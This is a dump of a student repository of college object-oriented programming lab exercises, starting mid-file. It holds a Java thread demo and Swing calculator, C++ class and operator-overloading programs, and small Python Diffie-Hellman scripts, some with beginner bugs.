Sort(array);\n\t\tSearch sea=new Search(array);\n\t\tg.start();\n\t\ttry\n\t\t{\n\t\t\ts.sleep(100);\n\t\t}catch(InterruptedException e){}\n\t\ts.start();\n\t\ttry\n\t\t{\n\t\t\tsea.sleep(100);\n\t\t}catch(InterruptedException e){}\n\t\tsea.start();\n\t\t/*for(i=10;i<100;i++)\n\t\t{\n\t\t\tSystem.out.println(array[i]);\n\t\t}*/\n\t}\n}" }, { "alpha_fraction": 0.6102643609046936, "alphanum_fraction": 0.6251944303512573, "avg_line_length": 18.029584884643555, "blob_id": "3ac61850d46e9f2f54e258fbd74034562e7a302d", "content_id": "b00aa8c25e5c30d7ce3ac8b224eb127232f5dd24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3215, "license_type": "no_license", "max_line_length": 57, "num_lines": 169, "path": "/JavaCalc.java", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "import java.awt.*;\nimport java.awt.event.*;\nimport javax.swing.*;\n\npublic class JavaCalc extends JFrame \n{\n\tprivate JTextField tfin,tfin1,tfout;\n\tprivate JButton plbtn,minbtn,mulbtn,divbtn,eqbtn,clrbtn;\n\tprivate int result=0,zero=0;\n\tprivate char flag='F';\n\n\tpublic JavaCalc()\n\t{\n\t\tContainer cp= getContentPane();\n\t\tcp.setLayout(new FlowLayout());\n\n\t\tcp.add(new JLabel (\"Input1\"));\n\t\ttfin1=new JTextField(10);\n\t\tcp.add(tfin1);\n\n\t\tcp.add(new JLabel (\"Input2\"));\n\t\ttfin=new JTextField(10);\n\t\tcp.add(tfin);\n\n\t\tplbtn=new JButton(\"+\");\n\t\tcp.add(plbtn);\n\n\t\tminbtn=new JButton(\"-\");\n\t\tcp.add(minbtn);\n\n\t\tmulbtn=new 
JButton(\"*\");\n\t\tcp.add(mulbtn);\n\n\t\tdivbtn=new JButton(\"/\");\n\t\tcp.add(divbtn);\n\n\t\teqbtn=new JButton(\"=\");\n\t\tcp.add(eqbtn);\n\n\t\tclrbtn=new JButton(\"CLR\");\n\t\tcp.add(clrbtn);\n\n\t\tcp.add(new JLabel (\"Result\"));\n\t\ttfout=new JTextField(10);\n\t\ttfout.setEditable(false);\n\t\tcp.add(tfout);\n\n\t\tcp.add(new JLabel(\"Developed by Nabeel Javed\"));\n\n\t\t//Action Listeners\n\t\tplbtn.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\tflag='+';\n\t\t\t}\n\t\t});\n\n\t\tminbtn.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\tflag='-';\n\t\t\t}\n\t\t});\n\n\t\tmulbtn.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\tflag='*';\n\t\t\t}\n\t\t});\n\n\t\tdivbtn.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\tflag='/';\n\t\t\t}\n\t\t});\n\n\t\tclrbtn.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\ttfin.setText(\"\");\n\t\t\t\ttfin1.setText(\"\");\n\t\t\t\ttfout.setText(\"\");\n\t\t\t}\n\t\t});\n\n\t\teqbtn.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\tint num1=Integer.parseInt(tfin1.getText());\n\t\t\t\tint num2=Integer.parseInt(tfin.getText());\n\t\t\t\tswitch(flag)\n\t\t\t\t{\n\t\t\t\t\tcase '+':result=num1+num2;break;\n\t\t\t\t\tcase '-':result=num1-num2;break;\n\t\t\t\t\tcase '*':result=num1*num2;break;\n\t\t\t\t\tcase '/':try{\n\t\t\t\t\t\t\t\tresult=num1/num2;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tcatch(ArithmeticException e){zero=1;}\n\t\t\t\t}\n\t\t\t\tif (zero==0)\n\t\t\t\t\ttfout.setText(result+\"\");\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tzero=0;\n\t\t\t\t\ttfout.setText(\"Zero Division Error\");\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\n\t\ttfin.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\tint num1=Integer.parseInt(tfin1.getText());\n\t\t\t\tint num2=Integer.parseInt(tfin.getText());\n\t\t\t\tswitch(flag)\n\t\t\t\t{\n\t\t\t\t\tcase '+':result=num1+num2;break;\n\t\t\t\t\tcase '-':result=num1-num2;break;\n\t\t\t\t\tcase '*':result=num1*num2;break;\n\t\t\t\t\tcase '/':try{\n\t\t\t\t\t\t\t\tresult=num1/num2;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tcatch(ArithmeticException e){zero=1;}\n\t\t\t\t}\n\t\t\t\tif (zero==0)\n\t\t\t\t\ttfout.setText(result+\"\");\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tzero=0;\n\t\t\t\t\ttfout.setText(\"Zero Division Error\");\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\n\t\tsetDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n\t\tsetTitle(\"Calculator\");\n\t\tsetSize(200,250);\n\t\tsetVisible(true);\n\t\tsetResizable(false);\n\t}\n\tpublic static void main(String [] args)\n\t{\n\t\tSwingUtilities.invokeLater(new Runnable()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void run()\n\t\t\t{\n\t\t\t\tnew JavaCalc();\n\t\t\t}\n\t\t});\n\t}\n}" }, { "alpha_fraction": 0.548019528388977, "alphanum_fraction": 0.5599566102027893, "avg_line_length": 14.239669799804688, "blob_id": "b136711f7d351ac6ee1619a5c5e0821fc8dd74cb", "content_id": "bf1b707b36166bbf54e39f2c5e62fccfafe3b375", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1843, "license_type": 
"no_license", "max_line_length": 58, "num_lines": 121, "path": "/inher2.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass employee\n{\n\tchar name[25];\n\tint eno;\n\tpublic:\n\t\temployee()\n\t\t{\n\t\t\tstrcpy(name,\"none\");\n\t\t\teno=0;\t\n\t\t}\n\t\tvoid getdata()\n\t\t{\n\t\t\tcout<<\"Enter name: \";\n\t\t\tcin>>name;\n\t\t\tcout<<\"Enter Employee number: \";\n\t\t\tcin>>eno;\n\t\t}\n\t\tvoid putdata()\n\t\t{\n\t\t\tcout<<\"Name:\"<<name<<\"\\tEmployee number:\"<<eno;\n\t\t}\n\t\t~employee();\n};\nclass manager: public employee\n{\n\tchar title[15];\n\tfloat dues;\n\tpublic:\n\t\tmanager()\n\t\t{\n\t\t\tstrcpy(title,\"employee\");\n\t\t\tdues=0.0;\n\t\t}\n\t\tvoid getdata()\n\t\t{\n\t\t\temployee::getdata();\n\t\t\tcout<<\"Enter title: \";\n\t\t\tcin>>title;\n\t\t\tcout<<\"Enyer dues: \";\n\t\t\tcin>>dues;\n\t\t}\n\t\tvoid putdata()\n\t\t{\n\t\t\temployee::putdata();\n\t\t\tcout<<\"\\tTitle:\"<<title<<\"\\tDues:\"<<dues;\n\t\t}\n\t\t~manager();\n};\nclass scientist: public employee\n{\n\tint noop;\n\tpublic:\n\t\tscientist()\n\t\t{\n\t\t\tnoop=0;\n\t\t}\n\t\tvoid getdata()\n\t\t{\n\t\t\temployee::getdata();\n\t\t\tcout<<\"Enter no of publications: \";\n\t\t\tcin>>noop;\n\t\t}\n\t\tvoid putdata()\n\t\t{\n\t\t\temployee::putdata();\n\t\t\tcout<<\"\\tPublications:\"<<noop;\n\t\t}\n\t\t~scientist();\n};\nclass labourer: public employee\n{\n\tpublic:\n\t\tlabourer();\n\t\tvoid getdata()\n\t\t{\n\t\t\temployee::getdata();\n\t\t}\n\t\tvoid putdata()\n\t\t{\n\t\t\temployee::putdata();\n\t\t\tcout<<\"\\n\";\n\t\t}\n\t\t~labourer();\n};\nint main()\n{\n\tmanager m[10];\n\tchar ch;\n\tint sn=0,ln=0,mn=0,n,i;\n\tscientist s[10];\n\tlabourer l[10];\n\tcout<<\"how many records?\";\n\tcin>>n;\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcout<<\"M for manager, S for scientist, L for labourer:\";\n\t\tcin>>ch;\n\t\tswitch(ch)\n\t\t{\n\t\t\tcase 's':\n\t\t\tcase 'S': s[sn++].getdata();break;\n\t\t\tcase 'm':\n\t\t\tcase 'M': m[mn++].getdata();break;\n\t\t\tcase 'l':\n\t\t\tcase 'L': l[ln++].getdata();break;\n\t\t\tdefault:cout<<\"wrong choice!\";\n\t\t}\n\t}\n\tcout<<\"\\nMANAGERS\\n\";\n\tfor(i=0;i<mn;i++)\n\t\tm[i].putdata();\n\tcout<<\"\\nSCIENTISTS\\n\";\n\tfor(i=0;i<sn;i++)\n\t\ts[i].putdata();\n\tcout<<\"\\nLABOURERS\\n\";\n\tfor(i=0;i<ln;i++)\n\t\tl[i].putdata();\n\treturn 0;\n}" }, { "alpha_fraction": 0.675000011920929, "alphanum_fraction": 0.675000011920929, "avg_line_length": 40, "blob_id": "5c3e9875ae49405b0b79de5fed8ee624246f07b2", "content_id": "c773d0ade7ede2e683b110b2c2213a7637c1648a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40, "license_type": "no_license", "max_line_length": 40, "num_lines": 1, "path": "/cop.py", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "a,b=input(\"Enter two numbers: \").split()" }, { "alpha_fraction": 0.5562130212783813, "alphanum_fraction": 0.5769230723381042, "avg_line_length": 17.740739822387695, "blob_id": "3016cc47f1ca1079129f31c848d597567424a962", "content_id": "df507b733071c8b14033ce9d6c31b54b3e3b2b37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1014, "license_type": "no_license", "max_line_length": 54, "num_lines": 54, "path": "/dhserv.py", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "def keygen():\n\timport random\n\tp,g=map(int,raw_input(\"Enter Public keys: 
\").split())\n\t#p=int(x[0])\n\t#g=int(x[1])\n\tb=random.randint(0,50)\n\tkey1=g**b%p\n\tprint \"Generated key: \",key1\n\tprint \"Private key: \",b\n\treturn str(key1),p,b\n\n\ndef seckey(msg,p,b):\n\n\tsk=(int(msg)**b)%p\n\tprint \"Secret Keys: \",sk\n\treturn sk\n\n\ndef keycheck(msg,sk):\n\tif sk==int(msg):\n\t\tprint \"Keys Matched!!!\"\n\telse:\n\t\tprint \"keys not matched!!!\"\n\nimport socket\n\nserv=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nhost=socket.gethostbyname(\"\")\n\nport=9999\n\nserv.bind((host,port))\n\nserv.listen(5)\n\nprint \"\\t******************\"\nprint \"\\t*SERVER IS ONLINE*\"\nprint \"\\t******************\\n\"\nwhile True:\n\tcli,addr=serv.accept()\n\tprint \"--------------------------------------------\"\n\tprint \"\\t\\tClient Connected\\n\"\n\tk,p,b=keygen()\n\tcli.send(k)\n\tmsg=cli.recv(4096)\n\ts=seckey(msg,p,b)\n\tmsg=cli.recv(4096)\n\tprint \"received secret key: \",msg\n\tkeycheck(msg,s)\n\tprint \"\\n\\t\\t Client Left\"\n\tprint \"--------------------------------------------\"\n\tcli.close()\n\n\n" }, { "alpha_fraction": 0.5132002830505371, "alphanum_fraction": 0.5286542177200317, "avg_line_length": 13, "blob_id": "2a80019df0bd01a4f45c747c170a4e0c7f1a9fa1", "content_id": "d53ebb511110be1d732e5c8caf80008628725fec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1553, "license_type": "no_license", "max_line_length": 54, "num_lines": 111, "path": "/virfn.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass stu\n{\n\tchar name[20];\n\tfloat sgpa;\n\tint out;\n\tpublic:\n\t\tvirtual void getname()\n\t\t{\n\t\t\tcout<<\"Enter Student's name: \";\n\t\t\tcin>>name;\n\t\t}\n\t\tvirtual void getdata()\n\t\t{\n\t\t\tcout<<\"Enter SGPA: \";\n\t\t\tcin>>sgpa;\n\t\t}\n\t\tvirtual void isoutstanding()\n\t\t{\n\t\t\tif(sgpa>8.5)\n\t\t\t\tout=1;\n\t\t\telse\n\t\t\t\tout=0;\n\t\t}\n\t\tvirtual int retout()\n\t\t{\t\n\t\t\treturn out;\n\t\t}\n\t\tvirtual void show()\n\t\t{\n\t\t\tcout<<\"Name:\"<<name<<\"\\tSGPA:\"<<sgpa<<endl;\n\t\t}\n};\nclass prof: public stu\n{\n\tchar name[25];\n\tint noop;\n\tint out;\n\tpublic:\n\t\tvoid getname()\n\t\t{\n\t\t\tcout<<\"Enter Professor's name: \";\n\t\t\tcin>>name;\n\t\t}\n\t\tvoid getdata()\n\t\t{\n\t\t\tcout<<\"Enter no of Publications: \";\n\t\t\tcin>>noop;\n\t\t}\n\t\tvoid isoutstanding()\n\t\t{\n\t\t\tif(noop>100)\n\t\t\t\tout=1;\n\t\t\telse\n\t\t\t\tout=0;\n\t\t}\n\t\tint retout()\n\t\t{\treturn out;}\n\t\tvoid show()\n\t\t{\n\t\t\tcout<<\"Name:\"<<name<<\"\\tPublications:\"<<noop<<endl;\n\t\t}\n};\nint main()\n{\n\tstu s[10];\n\tprof p[10];\n\tstu *sptr;\n\tchar c;\n\tint en,i;\n\tcout<<\"Professor or Student: \";\n\tcin>>c;\n\tif(c=='S' or c=='s')\n\t{\n\t\tcout<<\"Enter number of entries: \";\n\t\tcin>>en;\n\t\tfor(i=0;i<en;i++)\n\t\t{\n\t\t\tsptr=&s[i];\n\t\t\tsptr->getname();\n\t\t\tsptr->getdata();\n\t\t\tsptr->isoutstanding();\n\t\t}\n\t\tfor(i=0;i<en;i++)\n\t\t{\n\t\t\tsptr=&s[i];\n\t\t\tif(sptr->retout()==1)\n\t\t\t\tsptr->show();\n\t\t}\n\t}\n\telse if (c=='P' or c=='p')\n\t{\n\t\tcout<<\"Enter number of entries: \";\n\t\tcin>>en;\n\t\tfor(i=0;i<en;i++)\n\t\t{\n\t\t\tsptr=&p[i];\n\t\t\tsptr->getname();\n\t\t\tsptr->getdata();\n\t\t\tsptr->isoutstanding();\n\t\t}\n\t\tfor(i=0;i<en;i++)\n\t\t{\n\t\t\tsptr=&s[i];\n\t\t\tif(sptr->retout()==1)\n\t\t\t\tsptr->show();\n\t\t}\n\t}\n\treturn 0;\n}" }, { "alpha_fraction": 0.48782771825790405, "alphanum_fraction": 0.5252808928489685, 
"avg_line_length": 11.879518508911133, "blob_id": "46513e5473afde2c40bb133b30fe205793f27e5e", "content_id": "f67294559031f572ffdad03eac642822a3f8bb67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1068, "license_type": "no_license", "max_line_length": 47, "num_lines": 83, "path": "/oo2.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass weight\n{\n\t\tint kg,gr;\n\tpublic:\n\t\tweight()\n\t\t{\n\t\t\tkg=0;\n\t\t\tgr=0;\n\t\t}\n\t\tweight(int k,int g)\n\t\t{\n\t\t\tkg=k;gr=g;\n\t\t}\n\t\tweight operator + (weight w)\n\t\t{\n\t\t\tweight temp;\n\t\t\ttemp.kg=kg+w.kg;\n\t\t\ttemp.gr=gr+w.gr;\n\t\t\tif (temp.gr>1000)\n\t\t\t{\n\t\t\t\ttemp.gr%=1000;\n\t\t\t\ttemp.kg+=1;\n\t\t\t}\n\t\t\tcout<<temp.kg<<temp.gr;\n\t\t\treturn temp;\n\t\t}\n\t\tweight operator - (weight w)\n\t\t{\n\t\t\tweight temp;\n\t\t\ttemp.kg=kg-w.kg;\n\t\t\ttemp.gr=gr-w.gr;\n\t\t\treturn temp;\n\t\t}\n\t\tweight operator ++ ()\n\t\t{\n\t\t\tweight temp;\n\t\t\t++kg;\n\t\t\ttemp.kg=kg;\n\t\t\t++gr;\n\t\t\ttemp.gr=gr;\n\t\t\treturn temp;\n\t\t}\n\t\tweight operator -- ()\n\t\t{\n\t\t\tweight temp;\n\t\t\ttemp.kg=--kg;\n\t\t\ttemp.gr=--gr;\n\t\t\treturn temp;\n\t\t}\n\t\tweight operator = (weight w)\n\t\t{\n\t\t\tweight temp;\n\t\t\tkg=w.kg;\n\t\t\ttemp.kg=kg;\n\t\t\tgr=w.gr;\n\t\t\ttemp.gr=gr;\n\t\t\treturn temp;\n\t\t}\n\t\tvoid show()\n\t\t{\n\t\t\tcout<<kg<<\" kilogram(s)\t\"<<gr<<\" gram(s)\\n\";\n\t\t}\n};\n\nint main()\n{\n\tweight w1(7,900);\n\tweight w2(5,300);\n\tweight w3;\n\tw3=w2+w1;\n\tw3.show();\n\tw3=w1-w2;\n\tw3.show();\n\tw3=++w2;\n\tw3.show();\n\tw3=--w1;\n\tw3.show();\n\tw3=w2;\n\tw3.show();\n\treturn 0;\n}" }, { "alpha_fraction": 0.4753623306751251, "alphanum_fraction": 0.5072463750839233, "avg_line_length": 10.533333778381348, "blob_id": "1f2a5f0b97948de472f2535d3647254757f8411e", "content_id": "d40c39b7ed82d5449f27b23c5b65d7d58b431a01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 345, "license_type": "no_license", "max_line_length": 42, "num_lines": 30, "path": "/fo2.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass area\n{\n\tint a,b,c;\n\tpublic:\n\t\tarea()\n\t\t{\n\t\t\ta=0;b=0;c=0;\n\t\t}\n\t\tint ar(int p,int q=1)\n\t\t{\n\t\t\ta=p*p;\n\t\t\tcout<<\"Area of square: \"<<a;\n\t\t}\n\t\t/*void ar(int p,int q)\n\t\t{\n\t\t\ta=p*q;\n\t\t\tcout<<\"\\narea of rectangle: \"<<a<<endl;\n\t\t}\n\t\t*/\n};\nint main()\n{\n\tarea a1;\n\tint i,j;\n\ta1.ar(2);\n\ta1.ar(2,3);\n\treturn 0;\n}" }, { "alpha_fraction": 0.55340975522995, "alphanum_fraction": 0.5654797554016113, "avg_line_length": 14.07272720336914, "blob_id": "539a60b755090d3e25c23327b8feda2b97b3bc22", "content_id": "2a2ffe3e00b84d626688bf4d5dd32641a3c5ca49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1657, "license_type": "no_license", "max_line_length": 115, "num_lines": 110, "path": "/stu3.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nint l=0;\nclass student\n{\n\tint roll_no;\n\tchar name[20];\n\tfloat marks;\n\n\tpublic:\n\t\tstudent();\n\t\tstudent(int a, char b[],float c)\n\t\t{\n\t\t\troll_no=a;\n\t\t\tstrcpy(name,b);\n\t\t\tmarks=c;\n\t\t}\n\t\tstudent(student 
&s)\n\t\t{\n\t\t\troll_no=s.getroll();\n\t\t\tstrcpy(name,s.getname());\n\t\t\tmarks=s.getmarks();\n\n\t\t}\n\t\tint getroll();\n\t\tint getname()\n\t\t{\n\t\t\treturn name;\n\t\t}\n\t\tint getmarks()\n\t\t{\n\t\t\treturn marks;\n\t\t}\n\t\tvoid read();\n\t\tvoid print();\n};\nint student::ret_roll()\n{\n\tint s;\n\ts=roll_no;\n\treturn s;\n}\nvoid student::read()\n{\t\n\tcout<<\"Enter rollno, name and marks for student \";\n\tcin>>roll_no>>name>>marks;\n}\nvoid student::print()\n{\n\tcout<<\"Roll No:\"<<roll_no<<\"\tName:\"<<name<<\"\t\tMarks:\"<<marks<<endl;\n}\nint search(student s[])\n{\n\tint i,r,roll;\n\tcout<<\"Enter roll no to search: \";\n\tcin>>r;\n\tfor(i=0;i<l;i++)\n\t{\t\n\t\troll=s[i].getroll();\n\t\tif(r==roll)\n\t\t{\n\t\t\ts[i].print();\n\t\t\tbreak;\n\t\t}\n\t}\n\treturn i;\n}\nvoid del(student s[],int pos)\n{\n\tint i;\n\tfor(i=pos;i<l;i++)\n\t\ts[i]=s[i+1];\n\tcout<<\"Deleted record\\n\";\n\t--l;\n}\nvoid disp(student s[])\n{\n\tfor(int i=0;i<l;i++)\n\t\ts[i].print();\n}\nint main()\n{\n\tstudent s[5],x;\n\tint i,pos,ch;\n\tbool a=true;\n\twhile(a)\n\t{\n\t\tcout<<\"Enter your choice: \\n\";\n\t\tcout<<\"1. Add student\\n2. Search records\\n3. Update record\\n4. Delete record\\n5. Display All Records\\n6. Exit\\n\";\n\t\tcin>>ch;\n\t\tswitch(ch)\n\t\t{\n\t\t\tcase 1: s[l].read();\n\t\t\t\t\t++l;break;\n\t\t\tcase 2: search(s);break;\n\t\t\tcase 3: pos=search(s);\n\t\t\t\t\ts[pos].read();\n\t\t\t\t\tbreak;\n\t\t\tcase 4: pos=search(s);\n\t\t\t\t\tdel(s,pos);\n\t\t\t\t\tbreak;\n\t\t\tcase 5: disp(s);break;\n\t\t\tcase 6: cout<<\"Exiting...\";\n\t\t\t\t\ta=false;\n\t\t\t\t\tbreak;\n\t\t\tdefault:cout<<\"wrong choice\";\n\t\t}\n\t}\n\treturn 0;\n}" }, { "alpha_fraction": 0.5678571462631226, "alphanum_fraction": 0.625, "avg_line_length": 15.29411792755127, "blob_id": "585546d780ab1555327a9d4d65f047437d8c759c", "content_id": "8f8f6a44d62073b569a91aeaba54e956b5edb794", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 280, "license_type": "no_license", "max_line_length": 43, "num_lines": 17, "path": "/diffhell.py", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "def enc():\n\timport random\n\tx=raw_input(\"Enter Public keys: \").split()\n\tp=int(x[0])\n\tg=int(x[1])\n\ta=random.randint(0,50)\n\tkey1=g**a%p\n\tb=random.randint(0,50)\n\tkey2=g**b%p\n\tsec1=key1**a%p\n\tsec2=key2**b%p\n\tif sec1==sec2:\n\t\tprint \"Keys matched\"\n\telse:\n\t\tprint \"Not matched\"\n\nenc()\n\n\n\n" }, { "alpha_fraction": 0.5203837156295776, "alphanum_fraction": 0.5383692979812622, "avg_line_length": 15.057692527770996, "blob_id": "4730e3c33ef000d6f76962819229f9da9b8b89d2", "content_id": "7d2087e2cae88bb631a1a84f3f48f906e3195131", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 834, "license_type": "no_license", "max_line_length": 136, "num_lines": 52, "path": "/date.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass date\n{\n\tint day,month,year;\n\tpublic:\n\t\tdate(int a,int b,int c)\n\t\t{\n\t\t\tday=a;\n\t\t\tmonth=b;\n\t\t\tyear=c;\n\t\t}\n\t\tvoid setday(int a)\n\t\t{\n\t\t\tday=a;\n\t\t}\n\t\tvoid setmonth(int a)\n\t\t{\n\t\t\tmonth=a;\n\t\t}\n\t\tvoid setyear(int a)\n\t\t{\n\t\t\tyear=a;\n\t\t}\n\t\tvoid print_sdate()\n\t\t{\n\t\t\tif (day<10)\n\t\t\t\tcout<<\"0\"<<day<<\"-\";\n\t\t\telse\n\t\t\t\tcout<<day<<\"-\";\n\t\t\tif 
(month<10)\n\t\t\t\tcout<<\"0\"<<month<<\"-\";\n\t\t\telse\n\t\t\t\tcout<<month<<\"-\";\n\t\t\tcout<<year<<endl;\n\t\t}\n\t\tvoid print_ldate()\n\t\t{\n\t\t\tchar months[12][20]={\"January\",\"Februaury\",\"March\",\"April\",\"May\",\"June\",\"July\",\"August\",\"September\",\"October\",\"November\",\"December\"};\n\t\t\tcout<<\"\\n\"<<months[month-1]<<\" \"<<day<<\",\"<<year<<endl;\n\t\t}\n};\nint main()\n{\n\tint a,b,c;\n\tcout<<\"Enter day,month,year\\n\";\n\tcin>>a>>b>>c;\n\tdate d1(a,b,c);\n\td1.print_sdate();\n\td1.print_ldate();\n\treturn 0;\n}" }, { "alpha_fraction": 0.5581737756729126, "alphanum_fraction": 0.5802651047706604, "avg_line_length": 14.088889122009277, "blob_id": "ab764a124aaf1555e2d826a4cfdc69348c6005f0", "content_id": "106e7badaff442deb725d6be5ef2ae5f422c3144", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 679, "license_type": "no_license", "max_line_length": 69, "num_lines": 45, "path": "/const.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass student\n{\n\tpublic:\n\tint roll_no;\n\tchar name[20];\n\tfloat marks;\n\n\t\tstudent();\n\t\tstudent(int a, char b[],float c)\n\t\t{\n\t\t\troll_no=a;\n\t\t\tstrcpy(name,b);\n\t\t\tmarks=c;\n\t\t}\n\t\tstudent(student &s)\n\t\t{\n\t\t\troll_no=s.getroll();\n\t\t\tstrcpy(name,s.name);\n\t\t\tmarks=s.getmarks();\n\t\t}\n\t\tint getroll()\n\t\t{\n\t\t\treturn roll_no;\n\t\t}\n\t\tfloat getmarks()\n\t\t{\n\t\t\treturn marks;\n\t\t}\n\t\tvoid print()\n\t\t{\n\t\t\tcout<<\"Roll No:\"<<roll_no<<\" Name:\"<<name<<\" Marks:\"<<marks<<endl;\n\t\t}\n};\nint main()\n{\n\tstudent s1;\n\tstudent s2(12,\"Nabeel\",96.0);\n\tstudent s3(s2);\n\tcout<<\"Default: \";s1.print();\n\tcout<<\"Parameterized: \";s2.print();\n\tcout<<\"Copy: \";s3.print();\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.7872340679168701, "alphanum_fraction": 0.7872340679168701, "avg_line_length": 22.5, "blob_id": "170ed8a464d71091042d70b0f3c810c62d03685a", "content_id": "d16dea8ebbd9b157f5f10b40ffb4dcc36970b618", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 47, "license_type": "no_license", "max_line_length": 36, "num_lines": 2, "path": "/README.md", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "# OOPSlab\nPrograms done in OOPS lab in college\n" }, { "alpha_fraction": 0.5568445324897766, "alphanum_fraction": 0.6094354391098022, "avg_line_length": 14.04651165008545, "blob_id": "323c793b980346bd186594fc268988f7aaef6a0c", "content_id": "3e6dce3b13663d2b373b88c80bc529c741e4c785", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1293, "license_type": "no_license", "max_line_length": 51, "num_lines": 86, "path": "/oo3.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass weight\n{\n\t\tint kg,gr;\n\tpublic:\n\t\tweight()\n\t\t{\n\t\t\tkg=0;\n\t\t\tgr=0;\n\t\t}\n\t\tweight(int k,int g)\n\t\t{\n\t\t\tkg=k;gr=g;\n\t\t}\n\t\tfriend weight operator + (weight w1,weight w2);\n\t\tfriend weight operator - (weight w1,weight w2);\n\t\tfriend weight operator ++ (weight w1);\n\t\tfriend weight operator -- (weight w1);\n\t\t//friend weight operator = (weight w1,weight w2);\n\t\tvoid show()\n\t\t{\n\t\t\tcout<<kg<<\" kilogram(s)\t\"<<gr<<\" gram(s)\\n\";\n\t\t}\n};\nweight operator + (weight w1,weight w2)\n{\n\tweight 
temp;\n\ttemp.kg=w1.kg+w2.kg;\n\ttemp.gr=w1.gr+w2.gr;\n\tif (temp.gr>=1000)\n\t{\n\t\ttemp.gr%=1000;\n\t\ttemp.kg+=1;\n\t}\n\tcout<<temp.kg<<temp.gr;\n\treturn temp;\n}\nweight operator - (weight w1,weight w2)\n{\n\tweight temp;\n\ttemp.kg=w1.kg-w2.kg;\n\ttemp.gr=w1.gr-w2.gr;\n\treturn temp;\n}\nweight operator ++ (weight &w)\n{\n\tweight temp;\n\ttemp.kg=++w.kg;\n\ttemp.gr=++w.gr;\n\treturn temp;\n}\nweight operator -- (weight &w)\n{\n\tweight temp;\n\ttemp.kg=--w.kg;\n\ttemp.gr=--w.gr;\n\treturn temp;\n}\n/*weight operator = (weight w1,weight w2)\n{\n\tweight temp;\n\tw1.kg=w2.kg;\n\ttemp.kg=w1.kg;\n\tw1.gr=w2.gr;\n\ttemp.gr=w1.gr;\n\treturn temp;\n}*/\n\nint main()\n{\n\tweight w1(7,900);\n\tweight w2(5,300);\n\tweight w3;\n\tw3=w2+w1;\n\tw3.show();\n\tw3=w1-w2;\n\tw3.show();\n\tw3=++w2;\n\tw3.show();\n\tw3=--w1;\n\tw3.show();\n\tw3=w2;\n\tw3.show();\n\treturn 0;\n}" }, { "alpha_fraction": 0.47117793560028076, "alphanum_fraction": 0.5037593841552734, "avg_line_length": 10.11111068725586, "blob_id": "f5f3aa13d73a09ed5cee4dea886fd8dd7bb7b2f7", "content_id": "413733225b4f58a2189f30d361498f65e716a199", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 399, "license_type": "no_license", "max_line_length": 24, "num_lines": 36, "path": "/oo4.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\n#include 